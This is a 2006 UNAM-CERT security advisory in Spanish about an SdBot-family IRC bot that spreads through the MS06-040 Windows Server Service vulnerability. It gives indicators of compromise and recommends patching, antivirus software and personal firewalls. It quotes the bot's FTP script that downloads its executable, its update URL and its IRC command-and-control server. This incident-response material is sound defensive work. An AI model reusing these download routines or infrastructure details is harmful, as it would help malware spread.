Nota De Seguridad/unam−cert Unam−cert Departamento De

Transcript

UNAM−CERT Nota de Seguridad/UNAM−CERT UNAM−CERT Departamento de Seguridad en Cómputo DGSCA−UNAM Nota de Seguridad UNAM−CERT−2006−002 Propagación de código malicioso que explota el Servicio de Servidor de Windows El Departamento de Seguridad en Cómputo/UNAM−CERT ha atendido en la última semana un gran número de incidentes de seguridad relacionados con el sistema operativo Windows y que han sido causados por la infección de un código malicioso tipo bot que explota la vulnerabildiad en el Servicio de Servidor de Windows (MS06−040). Fecha de Liberación: 7 de Septiembre de 2006 Ultima Revisión: 2 de Octubre de 2006 Fuente: Departamento de Seguridad en Cómputo/UNAM−CERT Riesgo Crítico Problema de Vulnerabilidad Local y remoto Tipo de Vulnerabilidad Ejecución remota de código y negación de servicio I. Sistemas afectados Los sistemas operativos que han presentado infección por parte del bot son los siguientes: ♦ Windows NT 4.0 ♦ Windows 2000 Servive Pack 4 ♦ Windows XP Professional El 90% de los equipos reportados con este patrón de comportamiento a UNAM−CERT han sido Windows 2000 debido a que no presentan algún tipo de protección como un firewall personal, a diferencia de los sistemas XP que al tener instalado el Service Pack 2 habilitan de forma predeterminada el firewall de Windows. Sistemas afectados 1 UNAM−CERT Se ha detectado que el bot toma ventaja de la vulnerabilidad en el Servicio de Servidor de Windows que soluciona el Boletín de Seguridad de Microsoft MS06−040 por lo que no se descarta que también los siguientes sistemas puedan estar en riesgo de ser infectados si no tienen esta actualización instalada: ♦ Microsoft Windows XP Service Pack 2 ♦ Microsoft Windows XP Professional x64 Edition ♦ Microsoft Windows Server 2003 y Microsoft Windows Server 2003 Service Pack 1 ♦ Microsoft Windows Server 2003 para sistemas con Itanium y Microsoft Windows Server 2003 con SP1 para sistemas con Itanium II. Descripción El Proyecto Honeynet del UNAM−CERT en los últimos días ha detectado un incremento en la actividad de malware por parte de direcciones IP localizadas en la red universitaria. El monitoreo de algunas porciones de la red permitió identificar un incremento en la actividad hacia el puerto 139/tcp, el cual es un puerto utilizado por el servicio de NetBios en sistemas operativos Windows. En días pasados se realizó la captura de una nueva muestra de malware que se empieza a propagar rápidamente, infectando a varios equipos Windows en poco tiempo. El análisis de la muestra de malware realizado tanto por el equipo de Malware y Honeynet del UNAM−CERT dictaminó que se trata de un bot que permite el control remoto de equipos vulnerados para los fines que el intruso decida. Análisis del bot Éste código malicioso ya es detectado por distintas firmas antivirus como se puede ver a continuación: Antivirus AntiVir Authentium AVG DrWeb Ewido Kaspersky NOD32v2 Symantec UNA VBA32 Descripción Nombre Worm/Sdbot.65963.1 W32/Sdbot.UJO IRC/BackDoor.SdBot2.HNO BackDoor.IRC.Sdbot.792 Backdoor.SdBot.atz Backdoor.Win32.SdBot.atz Variante de IRC/SdBot W32.Spybot.Worm Backdoor.SdBot.2 Backdoor.Win32.SdBot.atz 2 UNAM−CERT Algunos nombres de los procesos con los que el bot se ejecuta en los sistemas son: ♦ smss.exe ♦ register.exe Los archivos ejecutables de estos procesos maliciosos usualmente están alojados en el directorio C:\Winnt (Windows NT y Windows 2000) y C:\Windows (Windows XP y Windows Sever 2003). Es importante señalar que el código malicioso se instala en el sistema como un servicio propio de Windows para que se inicie junto con el sistema operativo. Por ejemplo, para el caso del ejecutable smss.exe se instalará un servicio con el nombre de Windows NT Session Managers y para el ejecutable register.exe se instalará un servicio con el nombre Windows Register Control. Estos servicios pueden ser visualizados a través de la consola Servicios de Windows. Cabe señalar que el nombre de los servicios puede variar dependiendo de la variante del bot. El análisis también reveló que existe un archivo con nombre i (sin extensión) en el directorio C:\Winnt\system32 que contiene una rutina para descargar el ejecutable del bot como se muestra a continuación: open 132.248.X.X 25869 user 1 1 get setup_21262.exe quit Rutina de ejecución del bot El bot se conecta a un servidor IRC con el nombre de dominio mail2.tiktikz.com que resuelve al siguiente sitio: AS | IP | CC | AS Name 9844 | 61.97.152.3 | KR | HANINTERNET−AS HaninterNetworks De acuedo a diversos analisis del equipo UNAM−CERT el bot se conecta por el puerto 9632 y es importante denotar que se conecta a un canal llamado #edu, al parecer es un canal dedicado para equipos localizados en instituciones académicas, el bot se actualiza descargando un malware del sitio http://140.127.X.X/xsetup.exe, y se le ordena escanear el segmento /24 en el cual se encuentra el equipo utilizando los puertos 135/tcp NetBIOS, 139/tcp NetBIOS, 445/tcp NetBios y 1433/tcp MSQL Server. Descripción 3 UNAM−CERT III. Impacto Un equipo vulnerable puede sufrir una negación de servicio al consumir el bot todos los recursos del sistema y provocar un ataque de negación de servicio en la red al ejecutar su rutina de infección (escaneos) contra otros sistemas. IV. Solución ♦ Actualizar el sistema operativo Windows El bot toma ventajas de la vulnerabilidad en el Servicio de Servidor de Windows que fue cubierta por el Boletín de Seguridad de Microsoft MS06−040 liberado en Agosto pasado además de otras vulnerabilidades anteriores entre las que se encuentran: ◊ Vulnerabilidad en DCOM RPC (descrita en Boletín de Seguridad de MicrosoftMS03−026) utilizando el puerto 135 TCP. ◊ Buffer overflow Remoto en el Servicio Autoridad de Seguridad Local de Microsoft Windows (descrito en Boletín de Seguridad de MicrosoftMS04−011). ◊ Vulnerabilidades en Microsoft SQL Server 2000 o MSDE 2000 (descrita en Boletín de Seguridad de MicrosoftMS02−061) utilizando el puerto 1434 UDP. ◊ Vulnerabilidad en WebDav (descrita en Boletín de Seguridad de MicrosoftMS03−007) utilizando el puerto 80 TCP. ◊ Vulnerabilidad de Buffer Overflow en UPnP NOTIFY (descrita en Boletín de Seguridad de MicrosoftMS01−059). ◊ Vulnerabilidad de Buffer Overrun en el Servicio de Estación de Trabajo (descrita en Boletín de Seguridad de MicrosoftMS03−049) utilizando el puerto 445 TCP. ◊ Vulnerabilidad de Negación de Servicio en la Biblioteca SSL de Microsoft Windows (descrita en Boletín de Seguridad de MicrosoftMS04−011). ◊ Vulnerabilidad de Buffer Overflow en el Plug and Play de Microsoft Windows (descrita en Boletín de Seguridad de MicrosoftMS05−039). Debido a lo anteriormente mencionado es recomendable instalar a la brevedad todas las actualizaciones de seguridad liberadas hasta hoy en día. Es indispensable que el equipo cuente con el último Service Pack liberado para el sistema operativo en cuestión y todos los hotfixes liberados después de éste Service Pack. ♦ Instalar y administrar un software antivirus Es necesario instalar, actualizar y ejecutar algún tipo de software antivirus. Algunos de los software antivirus removerán o pondrán el cuarentena el proceso del bot. Impacto 4 UNAM−CERT Se debe establecer el software antivirus de tal forma que se ejecute un escaneo completo del equipo de forma periódica. ♦ Implementar un firewall personal En los sistemas Windows NT y Windows 2000 es indispensable instalar y configurar un firewall personal que les permita estar protegidos contra éste tipo de amenazas. En el mercado existe una gran variedad de distribuidores de firewalls personales. Algunos de los más importantes son los siguientes: ◊ ZoneAlarm − Zone Labs http://www.zonelabs.com ◊ Norton Personal Firewall − Symantec Corp. http://www.symantec.com ◊ Tiny Personal Firewall − Tiny Software Inc. http://www.tinysoftware.com ◊ Panda Platinum Internet Security − Panda Software http://www.pandasoftware.com ◊ F−Secure Internet Security − F−Secure http://www.f−secure.com ◊ Personal Firewall Plus − McAfee http://www.mcafee.com ◊ eTrust EZ Firewall − Computer Associates http://www.ca.com V. Referencias ♦ Proyecto Windows UNAM−CERT: windows at seguridad.unam.mx ♦ Honeynet UNAM−CERT: Proceso smss.exe ♦ UNAM−CERT: Vulnerabilidad en el Servicio de Servidor podría permitir la ejecución remota de código (921883) ♦ Usuario Casero UNAM−CERT: Firewalls personales. ♦ Usuario Casero UNAM−CERT: Software antivirus. ♦ Usuario Casero UNAM−CERT: Definición de Bot ♦ Symantec Corp: W32.Spybot.Worm ♦ Microsoft Corp: Boletín de seguridad de Microsoft MS06−040 El Departamento de Seguridad en Cómputo/UNAM−CERT agradece el apoyo en la traducción, elaboración y revisión de éste Documento a: • Jesús Ramón Jiménez Rojas (jrojas at seguridad dot unam dot mx) • David Jiménez Domínguez (djimenez at correo dot seguridad dot unam dot mx) • Ruben Aquino Luna (raquino at seguridad dot unam dot mx) • Juan Lopez Morales (jlopez at correo dot seguridad dot unam dot mx) • Luis Fernando Fuentes Serrano (lfuentes at seguridad dot unam dot mx) • Christian Calderon Hernádez (ccalderon at seguridad dot unam dot mx) • Sergio Alavez Miguel (salavez at seguridad dot unam dot mx) UNAM−CERT Equipo de Respuesta a Incidentes UNAM Referencias 5 UNAM−CERT Departamento de Seguridad en Cómputo E−Mail: [email protected] http://www.cert.org.mx http://www.seguridad.unam.mx ftp://ftp.seguridad.unam.mx Tel: 56 22 81 69 Fax: 56 22 80 43 Referencias 6